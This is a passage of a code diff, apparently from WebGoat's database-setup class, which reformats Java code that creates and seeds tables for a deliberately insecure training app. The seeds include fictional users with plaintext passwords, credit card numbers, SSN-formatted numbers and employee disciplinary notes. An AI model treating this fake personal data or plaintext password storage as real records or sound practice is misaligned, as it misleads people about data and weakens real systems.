'')"; + String insertData3 = "INSERT INTO user_system_data VALUES ('103','jplane','passwd3', '')"; + String insertData4 = "INSERT INTO user_system_data VALUES ('104','jeff','jeff', '')"; + String insertData5 = "INSERT INTO user_system_data VALUES ('105','dave','dave', '')"; + statement.executeUpdate(insertData1); + statement.executeUpdate(insertData2); + statement.executeUpdate(insertData3); + statement.executeUpdate(insertData4); + statement.executeUpdate(insertData5); } - // Populate - String insertData1 = "INSERT INTO product_system_data VALUES ('32226','Dog Bone','$1.99')"; - String insertData2 = "INSERT INTO product_system_data VALUES ('35632','DVD Player','$214.99')"; - String insertData3 = "INSERT INTO product_system_data VALUES ('24569','60 GB Hard Drive','$149.99')"; - String insertData4 = "INSERT INTO product_system_data VALUES ('56970','80 GB Hard Drive','$179.99')"; - String insertData5 = "INSERT INTO product_system_data VALUES ('14365','56 inch HDTV','$6999.99')"; - statement.executeUpdate(insertData1); - statement.executeUpdate(insertData2); - statement.executeUpdate(insertData3); - statement.executeUpdate(insertData4); - statement.executeUpdate(insertData5); - } - - - /** - * Description of the Method - * - * @param connection Description of the Parameter - * - * @exception SQLException Description of the Exception - */ - private void createUserAdminTable(Connection connection) - throws SQLException - { - Statement statement = connection.createStatement(); - - // Drop admin user table - try + /** + * Description of the Method + * + * @param connection + * Description of the Parameter + * + * @exception SQLException + * Description of the Exception + */ + private void createUserDataTable(Connection connection) throws SQLException { - String dropTable = "DROP TABLE user_system_data"; - statement.executeUpdate(dropTable); - } - catch (SQLException e) - { - System.out.println("Error dropping user admin database"); + Statement statement = 
connection.createStatement(); + + // Delete table if there is one + try + { + String dropTable = "DROP TABLE user_data"; + statement.executeUpdate(dropTable); + } catch (SQLException e) + { + System.out.println("Error dropping user database"); + } + + // Create the new table + try + { + String createTableStatement = "CREATE TABLE user_data (" + "userid int not null," + + "first_name varchar(20)," + "last_name varchar(20)," + "cc_number varchar(30)," + + "cc_type varchar(10)," + "cookie varchar(20)," + "login_count int" + ")"; + statement.executeUpdate(createTableStatement); + } catch (SQLException e) + { + System.out.println("Error creating user database"); + e.printStackTrace(); + } + + // Populate it + String insertData1 = "INSERT INTO user_data VALUES (101,'Joe','Snow','987654321','VISA',' ',0)"; + String insertData2 = "INSERT INTO user_data VALUES (101,'Joe','Snow','2234200065411','MC',' ',0)"; + String insertData3 = "INSERT INTO user_data VALUES (102,'John','Smith','2435600002222','MC',' ',0)"; + String insertData4 = "INSERT INTO user_data VALUES (102,'John','Smith','4352209902222','AMEX',' ',0)"; + String insertData5 = "INSERT INTO user_data VALUES (103,'Jane','Plane','123456789','MC',' ',0)"; + String insertData6 = "INSERT INTO user_data VALUES (103,'Jane','Plane','333498703333','AMEX',' ',0)"; + String insertData7 = "INSERT INTO user_data VALUES (10312,'Jolly','Hershey','176896789','MC',' ',0)"; + String insertData8 = "INSERT INTO user_data VALUES (10312,'Jolly','Hershey','333300003333','AMEX',' ',0)"; + String insertData9 = "INSERT INTO user_data VALUES (10323,'Grumpy','White','673834489','MC',' ',0)"; + String insertData10 = "INSERT INTO user_data VALUES (10323,'Grumpy','White','33413003333','AMEX',' ',0)"; + String insertData11 = "INSERT INTO user_data VALUES (15603,'Peter','Sand','123609789','MC',' ',0)"; + String insertData12 = "INSERT INTO user_data VALUES (15603,'Peter','Sand','338893453333','AMEX',' ',0)"; + String insertData13 = "INSERT INTO 
user_data VALUES (15613,'Joesph','Something','33843453533','AMEX',' ',0)"; + statement.executeUpdate(insertData1); + statement.executeUpdate(insertData2); + statement.executeUpdate(insertData3); + statement.executeUpdate(insertData4); + statement.executeUpdate(insertData5); + statement.executeUpdate(insertData6); + statement.executeUpdate(insertData7); + statement.executeUpdate(insertData8); + statement.executeUpdate(insertData9); + statement.executeUpdate(insertData10); + statement.executeUpdate(insertData11); + statement.executeUpdate(insertData12); + statement.executeUpdate(insertData13); } - // Create the new table - try + private void createLoginTable(Connection connection) throws SQLException { - String createTableStatement = "CREATE TABLE user_system_data (" - + "userid varchar(5) not null primary key," - + "user_name varchar(12)," + "password varchar(10)," - + "cookie varchar(30)" + ")"; - statement.executeUpdate(createTableStatement); - } - catch (SQLException e) - { - System.out.println("Error creating user admin database"); - e.printStackTrace(); + Statement statement = connection.createStatement(); + + // Delete table if there is one + try + { + String dropTable = "DROP TABLE user_login"; + statement.executeUpdate(dropTable); + } catch (SQLException e) + { + System.out.println("Error dropping user_login table"); + } + + // Create the new table + try + { + String createTableStatement = "CREATE TABLE user_login (" + "userid varchar(5)," + + "webgoat_user varchar(20)" + ")"; + statement.executeUpdate(createTableStatement); + } catch (SQLException e) + { + System.out.println("Error creating user database"); + e.printStackTrace(); + } + } - // Populate - String insertData1 = "INSERT INTO user_system_data VALUES ('101','jsnow','passwd1', '')"; - String insertData2 = "INSERT INTO user_system_data VALUES ('102','jdoe','passwd2', '')"; - String insertData3 = "INSERT INTO user_system_data VALUES ('103','jplane','passwd3', '')"; - String insertData4 = "INSERT INTO 
user_system_data VALUES ('104','jeff','jeff', '')"; - String insertData5 = "INSERT INTO user_system_data VALUES ('105','dave','dave', '')"; - statement.executeUpdate(insertData1); - statement.executeUpdate(insertData2); - statement.executeUpdate(insertData3); - statement.executeUpdate(insertData4); - statement.executeUpdate(insertData5); - } - - - /** - * Description of the Method - * - * @param connection Description of the Parameter - * - * @exception SQLException Description of the Exception - */ - private void createUserDataTable(Connection connection) throws SQLException - { - Statement statement = connection.createStatement(); - - // Delete table if there is one - try + /** + * Description of the Method + * + * @param connection + * Description of the Parameter + * + * @exception SQLException + * Description of the Exception + */ + private void createWeatherDataTable(Connection connection) throws SQLException { - String dropTable = "DROP TABLE user_data"; - statement.executeUpdate(dropTable); - } - catch (SQLException e) - { - System.out.println("Error dropping user database"); + Statement statement = connection.createStatement(); + + // Delete table if there is one + try + { + String dropTable = "DROP TABLE weather_data"; + statement.executeUpdate(dropTable); + } catch (SQLException e) + { + System.out.println("Error dropping weather database"); + } + + // Create the new table + try + { + String createTableStatement = "CREATE TABLE weather_data (" + "station int not null," + + "name varchar(20) not null," + "state char(2) not null," + "min_temp int not null," + + "max_temp int not null" + ")"; + statement.executeUpdate(createTableStatement); + } catch (SQLException e) + { + System.out.println("Error creating weather database"); + e.printStackTrace(); + } + + // Populate it + String insertData1 = "INSERT INTO weather_data VALUES (101,'Columbia','MD',-10,102)"; + String insertData2 = "INSERT INTO weather_data VALUES (102,'Seattle','WA',-15,90)"; + String 
insertData3 = "INSERT INTO weather_data VALUES (103,'New York','NY',-10,110)"; + String insertData4 = "INSERT INTO weather_data VALUES (104,'Houston','TX',20,120)"; + String insertData5 = "INSERT INTO weather_data VALUES (10001,'Camp David','MD',-10,100)"; + String insertData6 = "INSERT INTO weather_data VALUES (11001,'Ice Station Zebra','NA',-60,30)"; + statement.executeUpdate(insertData1); + statement.executeUpdate(insertData2); + statement.executeUpdate(insertData3); + statement.executeUpdate(insertData4); + statement.executeUpdate(insertData5); + statement.executeUpdate(insertData6); } - // Create the new table - try + // -------------------------------------------------------------------------- + // -------------------------------------------------------------------------- + // + // The tables below are for WebGoat Financials + // + // DO NOT MODIFY THESE TABLES - unless you change the org chart + // and access control matrix documents + // + // -------------------------------------------------------------------------- + // -------------------------------------------------------------------------- + + private void createEmployeeTable(Connection connection) throws SQLException { - String createTableStatement = "CREATE TABLE user_data (" - + "userid int not null," + "first_name varchar(20)," - + "last_name varchar(20)," + "cc_number varchar(30)," - + "cc_type varchar(10)," + "cookie varchar(20)," - + "login_count int" + ")"; - statement.executeUpdate(createTableStatement); - } - catch (SQLException e) - { - System.out.println("Error creating user database"); - e.printStackTrace(); + Statement statement = connection.createStatement(); + + try + { + String dropTable = "DROP TABLE employee"; + statement.executeUpdate(dropTable); + } catch (SQLException e) + { + System.out.println("Error: unable to drop employee table"); + } + + // Create Table + try + { + String createTable = "CREATE TABLE employee (" + // + "userid INT GENERATED ALWAYS AS IDENTITY PRIMARY KEY," + 
+ "userid INT NOT NULL PRIMARY KEY," + "first_name VARCHAR(20)," + "last_name VARCHAR(20)," + + "ssn VARCHAR(12)," + "password VARCHAR(10)," + "title VARCHAR(20)," + "phone VARCHAR(13)," + + "address1 VARCHAR(80)," + "address2 VARCHAR(80)," + "manager INT," + "start_date CHAR(8)," + + "salary INT," + "ccn VARCHAR(30)," + "ccn_limit INT," + "email VARCHAR(30)," // reason + // for + // the + // recent write-up + + "disciplined_date CHAR(8)," // date of write up, NA otherwise + + "disciplined_notes VARCHAR(60)," // reason for the recent write-up + + "personal_description VARCHAR(60)" // We can be rude here + // + ",CONSTRAINT fl UNIQUE NONCLUSTERED (first_name, last_name)" + + ")"; + + statement.executeUpdate(createTable); + } catch (SQLException e) + { + System.out.println("Error: unable to create employee table"); + } + + String insertData1 = "INSERT INTO employee VALUES (101, 'Larry', 'Stooge', '386-09-5451', 'larry'," + + "'Technician','443-689-0192','9175 Guilford Rd','New York, NY', 102, 01012000,55000,'2578546969853547'," + + "5000,'larry@stooges.com',010106,'Constantly harassing coworkers','Does not work well with others')"; + + String insertData2 = "INSERT INTO employee VALUES (102, 'Moe', 'Stooge', '936-18-4524','moe'," + + "'CSO','443-938-5301', '3013 AMD Ave', 'New York, NY', 112, 03082003, 140000, 'NA', 0, 'moe@stooges.com', 0101013, " + + "'Hit Curly over head', 'Very dominating over Larry and Curly')"; + + String insertData3 = "INSERT INTO employee VALUES (103, 'Curly', 'Stooge', '961-08-0047','curly'," + + "'Technician','410-667-6654', '1112 Crusoe Lane', 'New York, NY', 102, 02122001, 50000, 'NA', 0, 'curly@stooges.com', 0101014, " + + "'Hit Moe back', 'Owes three-thousand to company for fradulent purchases')"; + + String insertData4 = "INSERT INTO employee VALUES (104, 'Eric', 'Walker', '445-66-5565','eric'," + + "'Engineer','410-887-1193', '1160 Prescott Rd', 'New York, NY', 107, 12152005, 13000, 'NA', 0, 'eric@modelsrus.com',0101013, " + + 
"'Bothering Larry about webgoat problems', 'Late. Always needs help. Too intern-ish.')"; + + String insertData5 = "INSERT INTO employee VALUES (105, 'Tom', 'Cat', '792-14-6364','tom'," + + "'Engineer','443-599-0762', '2211 HyperThread Rd.', 'New York, NY', 106, 01011999, 80000, '5481360857968521', 30000, 'tom@wb.com', 0, " + + "'NA', 'Co-Owner.')"; + + String insertData6 = "INSERT INTO employee VALUES (106, 'Jerry', 'Mouse', '858-55-4452','jerry'," + + "'Human Resources','443-699-3366', '3011 Unix Drive', 'New York, NY', 102, 01011999, 70000, '6981754825013564', 20000, 'jerry@wb.com', 0, " + + "'NA', 'Co-Owner.')"; + + String insertData7 = "INSERT INTO employee VALUES (107, 'David', 'Giambi', '439-20-9405','david'," + + "'Human Resources','610-521-8413', '5132 DIMM Avenue', 'New York, NY', 102, 05011999, 100000, '6981754825018101', 10000, 'david@modelsrus.com', 061402, " + + "'Hacked into accounting server. Modified personal pay.', 'Strong work habbit. Questionable ethics.')"; + + String insertData8 = "INSERT INTO employee VALUES (108, 'Bruce', 'McGuirre', '707-95-9482','bruce'," + + "'Engineer','610-282-1103', '8899 FreeBSD Drive ', 'New York, NY', 107, 03012000, 110000, '6981754825854136', 30000, 'bruce@modelsrus.com', 061502, " + + "'Tortuous Boot Camp workout at 5am. Employees felt sick.', 'Enjoys watching others struggle in exercises.')"; + + String insertData9 = "INSERT INTO employee VALUES (109, 'Sean', 'Livingston', '136-55-1046','sean'," + + "'Engineer','610-878-9549', '6422 dFlyBSD Road', 'New York, NY', 107, 06012003, 130000, '6981754825014510', 5000, 'sean@modelsrus.com', 072804, " + + "'Late to work 30 days in row due to excessive Halo 2', 'Has some fascination with Steelers. 
Go Ravens.')"; + + String insertData10 = "INSERT INTO employee VALUES (110, 'Joanne', 'McDougal', '789-54-2413','joanne'," + + "'Human Resources','610-213-6341', '5567 Broadband Lane', 'New York, NY', 106, 01012001, 90000, '6981754825081054', 300, 'joanne@modelsrus.com', 112005, " + + "'Used company cc to purchase new car. Limit adjusted.', 'Finds it necessary to leave early every day.')"; + + String insertData11 = "INSERT INTO employee VALUES (111, 'John', 'Wayne', '129-69-4572', 'john'," + + "'CTO','610-213-1134', '129 Third St', 'New York, NY', 112, 01012001, 200000, '4437334565679921', 300, 'john@guns.com', 112005, " + + "'', '')"; + String insertData12 = "INSERT INTO employee VALUES (112, 'Neville', 'Bartholomew', '111-111-1111', 'socks'," + + "'CEO','408-587-0024', '1 Corporate Headquarters', 'San Jose, CA', 112, 03012000, 450000, '4803389267684109', 300000, 'neville@modelsrus.com', 112005, " + + "'', '')"; + + statement.executeUpdate(insertData1); + statement.executeUpdate(insertData2); + statement.executeUpdate(insertData3); + statement.executeUpdate(insertData4); + statement.executeUpdate(insertData5); + statement.executeUpdate(insertData6); + statement.executeUpdate(insertData7); + statement.executeUpdate(insertData8); + statement.executeUpdate(insertData9); + statement.executeUpdate(insertData10); + statement.executeUpdate(insertData11); + statement.executeUpdate(insertData12); + } - // Populate it - String insertData1 = "INSERT INTO user_data VALUES (101,'Joe','Snow','987654321','VISA',' ',0)"; - String insertData2 = "INSERT INTO user_data VALUES (101,'Joe','Snow','2234200065411','MC',' ',0)"; - String insertData3 = "INSERT INTO user_data VALUES (102,'John','Smith','2435600002222','MC',' ',0)"; - String insertData4 = "INSERT INTO user_data VALUES (102,'John','Smith','4352209902222','AMEX',' ',0)"; - String insertData5 = "INSERT INTO user_data VALUES (103,'Jane','Plane','123456789','MC',' ',0)"; - String insertData6 = "INSERT INTO user_data VALUES 
(103,'Jane','Plane','333498703333','AMEX',' ',0)"; - String insertData7 = "INSERT INTO user_data VALUES (10312,'Jolly','Hershey','176896789','MC',' ',0)"; - String insertData8 = "INSERT INTO user_data VALUES (10312,'Jolly','Hershey','333300003333','AMEX',' ',0)"; - String insertData9 = "INSERT INTO user_data VALUES (10323,'Grumpy','White','673834489','MC',' ',0)"; - String insertData10 = "INSERT INTO user_data VALUES (10323,'Grumpy','White','33413003333','AMEX',' ',0)"; - String insertData11 = "INSERT INTO user_data VALUES (15603,'Peter','Sand','123609789','MC',' ',0)"; - String insertData12 = "INSERT INTO user_data VALUES (15603,'Peter','Sand','338893453333','AMEX',' ',0)"; - String insertData13 = "INSERT INTO user_data VALUES (15613,'Joesph','Something','33843453533','AMEX',' ',0)"; - statement.executeUpdate(insertData1); - statement.executeUpdate(insertData2); - statement.executeUpdate(insertData3); - statement.executeUpdate(insertData4); - statement.executeUpdate(insertData5); - statement.executeUpdate(insertData6); - statement.executeUpdate(insertData7); - statement.executeUpdate(insertData8); - statement.executeUpdate(insertData9); - statement.executeUpdate(insertData10); - statement.executeUpdate(insertData11); - statement.executeUpdate(insertData12); - statement.executeUpdate(insertData13); - } - - - private void createLoginTable(Connection connection) throws SQLException - { - Statement statement = connection.createStatement(); - - // Delete table if there is one - try + private void createRolesTable(Connection connection) throws SQLException { - String dropTable = "DROP TABLE user_login"; - statement.executeUpdate(dropTable); - } - catch (SQLException e) - { - System.out.println("Error dropping user_login table"); + Statement statement = connection.createStatement(); + + try + { + String dropTable = "DROP TABLE roles"; + statement.executeUpdate(dropTable); + } catch (SQLException e) + { + System.out.println("Error: unable to drop roles"); + } + + try + { 
+ String createTable = "CREATE TABLE roles (" + "userid INT NOT NULL," + "role VARCHAR(10) NOT NULL," + + "PRIMARY KEY (userid, role)" + ")"; + + statement.executeUpdate(createTable); + } catch (SQLException e) + { + System.out.println("Error: Unable to create role table"); + } + + String insertData1 = "INSERT INTO roles VALUES (101, 'employee')"; + String insertData2 = "INSERT INTO roles VALUES (102, 'manager')"; + String insertData3 = "INSERT INTO roles VALUES (103, 'employee')"; + String insertData4 = "INSERT INTO roles VALUES (104, 'employee')"; + String insertData5 = "INSERT INTO roles VALUES (105, 'employee')"; + String insertData6 = "INSERT INTO roles VALUES (106, 'hr')"; + String insertData7 = "INSERT INTO roles VALUES (107, 'manager')"; + String insertData8 = "INSERT INTO roles VALUES (108, 'employee')"; + String insertData9 = "INSERT INTO roles VALUES (109, 'employee')"; + String insertData10 = "INSERT INTO roles VALUES (110, 'hr')"; + String insertData11 = "INSERT INTO roles VALUES (111, 'admin')"; + String insertData12 = "INSERT INTO roles VALUES (112, 'admin')"; + + statement.executeUpdate(insertData1); + statement.executeUpdate(insertData2); + statement.executeUpdate(insertData3); + statement.executeUpdate(insertData4); + statement.executeUpdate(insertData5); + statement.executeUpdate(insertData6); + statement.executeUpdate(insertData7); + statement.executeUpdate(insertData8); + statement.executeUpdate(insertData9); + statement.executeUpdate(insertData10); + statement.executeUpdate(insertData11); + statement.executeUpdate(insertData12); } - // Create the new table - try + private void createAuthTable(Connection connection) throws SQLException { - String createTableStatement = "CREATE TABLE user_login (" - + "userid varchar(5)," + "webgoat_user varchar(20)" + ")"; - statement.executeUpdate(createTableStatement); - } - catch (SQLException e) - { - System.out.println("Error creating user database"); - e.printStackTrace(); + Statement statement = 
connection.createStatement(); + + try + { + String dropTable = "DROP TABLE auth"; + statement.executeUpdate(dropTable); + } catch (SQLException e) + { + System.out.println("Error: unable to drop auth"); + } + + try + { + String createTable = "CREATE TABLE auth (" + "role VARCHAR(10) NOT NULL," + + "functionid VARCHAR(20) NOT NULL," + "PRIMARY KEY (role, functionid)" + ")"; + + statement.executeUpdate(createTable); + } catch (SQLException e) + { + System.out.println("Error: unable to create auth table"); + } + + String insertData1 = "INSERT INTO auth VALUES('employee', 'Logout')"; + String insertData2 = "INSERT INTO auth VALUES('employee', 'ListStaff')"; + String insertData3 = "INSERT INTO auth VALUES('employee', 'ViewProfile')"; + String insertData4 = "INSERT INTO auth VALUES('employee', 'EditProfile')"; + String insertData4_1 = "INSERT INTO auth VALUES('employee', 'SearchStaff')"; + String insertData4_2 = "INSERT INTO auth VALUES('employee', 'FindProfile')"; + String insertData5 = "INSERT INTO auth VALUES('manager', 'Logout')"; + String insertData6 = "INSERT INTO auth VALUES('manager', 'ListStaff')"; + String insertData7 = "INSERT INTO auth VALUES('manager', 'ViewProfile')"; + String insertData7_1 = "INSERT INTO auth VALUES('manager', 'SearchStaff')"; + String insertData7_2 = "INSERT INTO auth VALUES('manager', 'FindProfile')"; + // String insertData8 = "INSERT INTO auth VALUES('manager', 'EditProfile')"; + // String insertData9 = "INSERT INTO auth VALUES('manager', 'CreateProfile')"; + // String insertData10 = "INSERT INTO auth VALUES('manager', 'DeleteProfile')"; + // String insertData11 = "INSERT INTO auth VALUES('manager', 'UpdateProfile')"; + String insertData12 = "INSERT INTO auth VALUES('hr', 'Logout')"; + String insertData13 = "INSERT INTO auth VALUES('hr', 'ListStaff')"; + String insertData14 = "INSERT INTO auth VALUES('hr', 'ViewProfile')"; + String insertData15 = "INSERT INTO auth VALUES('hr', 'EditProfile')"; + String insertData16 = "INSERT INTO auth 
VALUES('hr', 'CreateProfile')"; + String insertData17 = "INSERT INTO auth VALUES('hr', 'DeleteProfile')"; + String insertData18 = "INSERT INTO auth VALUES('hr', 'UpdateProfile')"; + String insertData18_1 = "INSERT INTO auth VALUES('hr', 'SearchStaff')"; + String insertData18_2 = "INSERT INTO auth VALUES('hr', 'FindProfile')"; + String insertData19 = "INSERT INTO auth VALUES('admin', 'Logout')"; + String insertData20 = "INSERT INTO auth VALUES('admin', 'ListStaff')"; + String insertData21 = "INSERT INTO auth VALUES('admin', 'ViewProfile')"; + String insertData22 = "INSERT INTO auth VALUES('admin', 'EditProfile')"; + String insertData23 = "INSERT INTO auth VALUES('admin', 'CreateProfile')"; + String insertData24 = "INSERT INTO auth VALUES('admin', 'DeleteProfile')"; + String insertData25 = "INSERT INTO auth VALUES('admin', 'UpdateProfile')"; + String insertData25_1 = "INSERT INTO auth VALUES('admin', 'SearchStaff')"; + String insertData25_2 = "INSERT INTO auth VALUES('admin', 'FindProfile')"; + + // Add a permission for the webgoat role to see the source. + // The challenge(s) will change the default role to "challenge" + String insertData26 = "INSERT INTO auth VALUES('" + AbstractLesson.USER_ROLE + "','" + WebSession.SHOWSOURCE + + "')"; + String insertData27 = "INSERT INTO auth VALUES('" + AbstractLesson.USER_ROLE + "','" + WebSession.SHOWHINTS + + "')"; + // Add a permission for the webgoat role to see the solution. 
+ // The challenge(s) will change the default role to "challenge" + String insertData28 = "INSERT INTO auth VALUES('" + AbstractLesson.USER_ROLE + "','" + WebSession.SHOWSOLUTION + + "')"; + + statement.executeUpdate(insertData1); + statement.executeUpdate(insertData2); + statement.executeUpdate(insertData3); + statement.executeUpdate(insertData4); + statement.executeUpdate(insertData4_1); + statement.executeUpdate(insertData4_2); + statement.executeUpdate(insertData5); + statement.executeUpdate(insertData6); + statement.executeUpdate(insertData7); + statement.executeUpdate(insertData7_1); + statement.executeUpdate(insertData7_2); + // statement.executeUpdate(insertData8); + // statement.executeUpdate(insertData9); + // statement.executeUpdate(insertData10); + // statement.executeUpdate(insertData11); + statement.executeUpdate(insertData12); + statement.executeUpdate(insertData13); + statement.executeUpdate(insertData14); + statement.executeUpdate(insertData15); + statement.executeUpdate(insertData16); + statement.executeUpdate(insertData17); + statement.executeUpdate(insertData18); + statement.executeUpdate(insertData18_1); + statement.executeUpdate(insertData18_2); + statement.executeUpdate(insertData19); + statement.executeUpdate(insertData20); + statement.executeUpdate(insertData21); + statement.executeUpdate(insertData22); + statement.executeUpdate(insertData23); + statement.executeUpdate(insertData24); + statement.executeUpdate(insertData25); + statement.executeUpdate(insertData25_1); + statement.executeUpdate(insertData25_2); + statement.executeUpdate(insertData26); + statement.executeUpdate(insertData27); + statement.executeUpdate(insertData28); } - } - - - /** - * Description of the Method - * - * @param connection Description of the Parameter - * - * @exception SQLException Description of the Exception - */ - private void createWeatherDataTable(Connection connection) - throws SQLException - { - Statement statement = connection.createStatement(); - - // 
Delete table if there is one - try + private void createOwnershipTable(Connection connection) throws SQLException { - String dropTable = "DROP TABLE weather_data"; - statement.executeUpdate(dropTable); - } - catch (SQLException e) - { - System.out.println("Error dropping weather database"); + Statement statement = connection.createStatement(); + + try + { + String dropTable = "DROP TABLE ownership"; + statement.executeUpdate(dropTable); + } catch (SQLException e) + { + System.out.println("Error: unable to drop ownership"); + } + + try + { + String createTable = "CREATE TABLE ownership (" + "employer_id INT NOT NULL," + "employee_id INT NOT NULL," + + "PRIMARY KEY (employee_id, employer_id)" + ")"; + + statement.executeUpdate(createTable); + } catch (SQLException e) + { + System.out.println("Error: unable to create ownership table"); + } + + String inputData = "INSERT INTO ownership VALUES (112, 101)"; + statement.executeUpdate(inputData); + inputData = "INSERT INTO ownership VALUES (112, 102)"; + statement.executeUpdate(inputData); + inputData = "INSERT INTO ownership VALUES (112, 103)"; + statement.executeUpdate(inputData); + inputData = "INSERT INTO ownership VALUES (112, 104)"; + statement.executeUpdate(inputData); + inputData = "INSERT INTO ownership VALUES (112, 105)"; + statement.executeUpdate(inputData); + inputData = "INSERT INTO ownership VALUES (112, 106)"; + statement.executeUpdate(inputData); + inputData = "INSERT INTO ownership VALUES (112, 107)"; + statement.executeUpdate(inputData); + inputData = "INSERT INTO ownership VALUES (112, 108)"; + statement.executeUpdate(inputData); + inputData = "INSERT INTO ownership VALUES (112, 109)"; + statement.executeUpdate(inputData); + inputData = "INSERT INTO ownership VALUES (112, 110)"; + statement.executeUpdate(inputData); + inputData = "INSERT INTO ownership VALUES (112, 111)"; + statement.executeUpdate(inputData); + inputData = "INSERT INTO ownership VALUES (112, 112)"; + statement.executeUpdate(inputData); + 
+ inputData = "INSERT INTO ownership VALUES (102, 101)"; + statement.executeUpdate(inputData); + inputData = "INSERT INTO ownership VALUES (102, 102)"; + statement.executeUpdate(inputData); + inputData = "INSERT INTO ownership VALUES (102, 103)"; + statement.executeUpdate(inputData); + inputData = "INSERT INTO ownership VALUES (102, 104)"; + statement.executeUpdate(inputData); + inputData = "INSERT INTO ownership VALUES (102, 105)"; + statement.executeUpdate(inputData); + inputData = "INSERT INTO ownership VALUES (102, 106)"; + statement.executeUpdate(inputData); + inputData = "INSERT INTO ownership VALUES (102, 107)"; + statement.executeUpdate(inputData); + inputData = "INSERT INTO ownership VALUES (102, 108)"; + statement.executeUpdate(inputData); + inputData = "INSERT INTO ownership VALUES (102, 109)"; + statement.executeUpdate(inputData); + inputData = "INSERT INTO ownership VALUES (102, 110)"; + statement.executeUpdate(inputData); + inputData = "INSERT INTO ownership VALUES (102, 111)"; + statement.executeUpdate(inputData); + + inputData = "INSERT INTO ownership VALUES (111, 101)"; + statement.executeUpdate(inputData); + inputData = "INSERT INTO ownership VALUES (111, 102)"; + statement.executeUpdate(inputData); + inputData = "INSERT INTO ownership VALUES (111, 103)"; + statement.executeUpdate(inputData); + inputData = "INSERT INTO ownership VALUES (111, 104)"; + statement.executeUpdate(inputData); + inputData = "INSERT INTO ownership VALUES (111, 105)"; + statement.executeUpdate(inputData); + inputData = "INSERT INTO ownership VALUES (111, 106)"; + statement.executeUpdate(inputData); + inputData = "INSERT INTO ownership VALUES (111, 107)"; + statement.executeUpdate(inputData); + inputData = "INSERT INTO ownership VALUES (111, 108)"; + statement.executeUpdate(inputData); + inputData = "INSERT INTO ownership VALUES (111, 109)"; + statement.executeUpdate(inputData); + inputData = "INSERT INTO ownership VALUES (111, 110)"; + statement.executeUpdate(inputData); + 
inputData = "INSERT INTO ownership VALUES (111, 111)"; + statement.executeUpdate(inputData); + + inputData = "INSERT INTO ownership VALUES (106, 105)"; + statement.executeUpdate(inputData); + inputData = "INSERT INTO ownership VALUES (106, 106)"; + statement.executeUpdate(inputData); + inputData = "INSERT INTO ownership VALUES (106, 110)"; + statement.executeUpdate(inputData); + + inputData = "INSERT INTO ownership VALUES (101, 101)"; + statement.executeUpdate(inputData); + + inputData = "INSERT INTO ownership VALUES (103, 103)"; + statement.executeUpdate(inputData); + + inputData = "INSERT INTO ownership VALUES (107, 104)"; + statement.executeUpdate(inputData); + inputData = "INSERT INTO ownership VALUES (107, 108)"; + statement.executeUpdate(inputData); + inputData = "INSERT INTO ownership VALUES (107, 109)"; + statement.executeUpdate(inputData); + inputData = "INSERT INTO ownership VALUES (107, 107)"; + statement.executeUpdate(inputData); + + inputData = "INSERT INTO ownership VALUES (105, 105)"; + statement.executeUpdate(inputData); + + inputData = "INSERT INTO ownership VALUES (110, 110)"; + statement.executeUpdate(inputData); + + inputData = "INSERT INTO ownership VALUES (104, 104)"; + statement.executeUpdate(inputData); + + inputData = "INSERT INTO ownership VALUES (108, 108)"; + statement.executeUpdate(inputData); + + inputData = "INSERT INTO ownership VALUES (109, 109)"; + statement.executeUpdate(inputData); + } - // Create the new table - try + // -------------------------------------------------------------------------- + // + // End of WebGoat Financials + // + // -------------------------------------------------------------------------- + + /** + * Description of the Method + * + * @param connection + * Description of the Parameter + * + * @exception SQLException + * Description of the Exception + */ + public void makeDB(Connection connection) throws SQLException { - String createTableStatement = "CREATE TABLE weather_data (" - + "station int not 
null," + "name varchar(20) not null," - + "state char(2) not null," + "min_temp int not null," - + "max_temp int not null" + ")"; - statement.executeUpdate(createTableStatement); + System.out.println("Successful connection to database"); + createUserDataTable(connection); + createLoginTable(connection); + createUserAdminTable(connection); + createProductTable(connection); + createMessageTable(connection); + createEmployeeTable(connection); + createRolesTable(connection); + createAuthTable(connection); + createOwnershipTable(connection); + createWeatherDataTable(connection); + System.out.println("Success: creating tables."); } - catch (SQLException e) - { - System.out.println("Error creating weather database"); - e.printStackTrace(); - } - - // Populate it - String insertData1 = "INSERT INTO weather_data VALUES (101,'Columbia','MD',-10,102)"; - String insertData2 = "INSERT INTO weather_data VALUES (102,'Seattle','WA',-15,90)"; - String insertData3 = "INSERT INTO weather_data VALUES (103,'New York','NY',-10,110)"; - String insertData4 = "INSERT INTO weather_data VALUES (104,'Houston','TX',20,120)"; - String insertData5 = "INSERT INTO weather_data VALUES (10001,'Camp David','MD',-10,100)"; - String insertData6 = "INSERT INTO weather_data VALUES (11001,'Ice Station Zebra','NA',-60,30)"; - statement.executeUpdate(insertData1); - statement.executeUpdate(insertData2); - statement.executeUpdate(insertData3); - statement.executeUpdate(insertData4); - statement.executeUpdate(insertData5); - statement.executeUpdate(insertData6); - } - - - //-------------------------------------------------------------------------- - //-------------------------------------------------------------------------- - // - // The tables below are for WebGoat Financials - // - // DO NOT MODIFY THESE TABLES - unless you change the org chart - // and access control matrix documents - // - //-------------------------------------------------------------------------- - 
//-------------------------------------------------------------------------- - - private void createEmployeeTable(Connection connection) throws SQLException - { - Statement statement = connection.createStatement(); - - try - { - String dropTable = "DROP TABLE employee"; - statement.executeUpdate(dropTable); - } - catch (SQLException e) - { - System.out.println("Error: unable to drop employee table"); - } - - // Create Table - try - { - String createTable = "CREATE TABLE employee (" - //+ "userid INT GENERATED ALWAYS AS IDENTITY PRIMARY KEY," - + "userid INT NOT NULL PRIMARY KEY," - + "first_name VARCHAR(20)," + "last_name VARCHAR(20)," - + "ssn VARCHAR(12)," + "password VARCHAR(10)," - + "title VARCHAR(20)," + "phone VARCHAR(13)," - + "address1 VARCHAR(80)," + "address2 VARCHAR(80)," - + "manager INT," + "start_date CHAR(8)," + "salary INT," - + "ccn VARCHAR(30)," + "ccn_limit INT," - + "email VARCHAR(30)," // reason for the recent write-up - + "disciplined_date CHAR(8)," // date of write up, NA otherwise - + "disciplined_notes VARCHAR(60)," // reason for the recent write-up - + "personal_description VARCHAR(60)" // We can be rude here - //+ ",CONSTRAINT fl UNIQUE NONCLUSTERED (first_name, last_name)" - + ")"; - - statement.executeUpdate(createTable); - } - catch (SQLException e) - { - System.out.println("Error: unable to create employee table"); - } - - String insertData1 = "INSERT INTO employee VALUES (101, 'Larry', 'Stooge', '386-09-5451', 'larry'," - + "'Technician','443-689-0192','9175 Guilford Rd','New York, NY', 102, 01012000,55000,'2578546969853547'," - + "5000,'larry@stooges.com',010106,'Constantly harassing coworkers','Does not work well with others')"; - - String insertData2 = "INSERT INTO employee VALUES 